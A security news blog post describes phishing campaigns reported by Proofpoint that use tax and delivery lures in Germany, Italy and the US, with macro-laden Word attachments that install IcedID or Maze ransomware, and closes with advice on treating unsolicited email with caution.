Phishing email campaigns are being recycled almost every year and they just modify the content and upgrade code to avoid detection. It is one of the trickiest tactics employed by cybercriminals to try to lure potential victims into taking their bait.
The email campaign is said to have been hitting Europe and United States and spreads trojans onto computers.
They basically mask the contents to look like it came from legitimate businesses and organizations.
If you are not familiar with the term phishing emails, let me explain it to you. For example, you sometimes get emails from FedEx, UPS, you bank or credit card companies; basically they try to look like one of those but when you click on them, open any link within the email or open any attachment, they can infect you with malware or steal information from you.
Discovered in 2017 by IBM X-Force Research, IcedID typically targets banks, payment card providers, and other financial institutions in an attempt to steal user credentials.
However, this new malware does not target financial companies. This new phishing email campaign discovered by Proofpoint was heavily directly at the healthcare industry.
The emails discovered use the URL uspsdelivery-service.com, while the malicious Word documents contain a purported RSA SecurID key. Opening the Word document triggers a Microsoft Office macro that launches a PowerShell script, which then downloads and installs IcedID onto the computer.
The United States of America is the latest target of this campaign. They have been targeting businesses in Germany with emails pretending to be the German Federal Ministry of Finance. Besides the fact they capitalize on the phony branding, they use .icu domains in the sender’s address.
The interesting part of this campaign is that the malware developers used Cobalt Strike which is a commercially available penetration testing software and was used to deploy malware
Sent primarily to German IT services companies, the fraudulent email promises a 2019 tax refund, asking the recipient to open an attached Word document to submit a claim for the refund. Instead, opening the document launches an Office macro that executes a PowerShell script, which then downloads and installs Maze ransomware.
A similar campaign targeted Italy last October. They used branding from the Italian Ministry of Taxation but also with .icu domains in the sender’s address similar to other ones. As with the emails campaing targeting US companies, they allegedly used RSA SecurID keys to make it look legitimate.
The email tells the recipient that they should open and read the attached file or document to avoid tax assessment and penalties. In reality, what it does is triggers macros to run download payloads via powershell scripts and install Maze ransomware.
Most of the time, they use finance-related tricks which is seasonal in nature. They typically deploy more tax-related phishing emails in time with the annual tax filing deadlines. The malware developers normally applies to any country they target.
Back in 2017 they even used social engineering to help deliver banking Trojans and spread ransomware. Even last year 2018, researchers from Proofpoint discovered phishing campaigns in the US with tax-related lures and IRS branding.
It is a never ending cat and mouse chase in finding and neutralizing malware. Tons of malware amounting to millions are being sorted out every day. It takes time to identify and analyze the latest campaigns. As per ProofPoint’s analysis, the campaigns actions did not overlap those of existing threat actors, making it obvious there is a new group that have made the attacks. Some evidence uncovered indicated that the actor is Russian-speaking.
“Although these campaigns are small in volume, currently, they are significant for their abuse of trusted brands, including government agencies, and for their relatively rapid expansion across multiple geographies,” Christopher Dawson, Threat Intelligence Lead for Proofpoint, said.
As from what they have gathered, this group has targeted organizations in Germany, Italy and the United States. They hand craft it to suit the country they target and even use the correct language for the intended recipients.
Unsolicited emails should be treated with caution. Be extra careful opening attachments and same principle goes to opening/clicking links or entering credentials. If you get an email about your accounts, banking, finances, taxes, shipping/courier services, double-check if it is a legitimate email you are expecting.
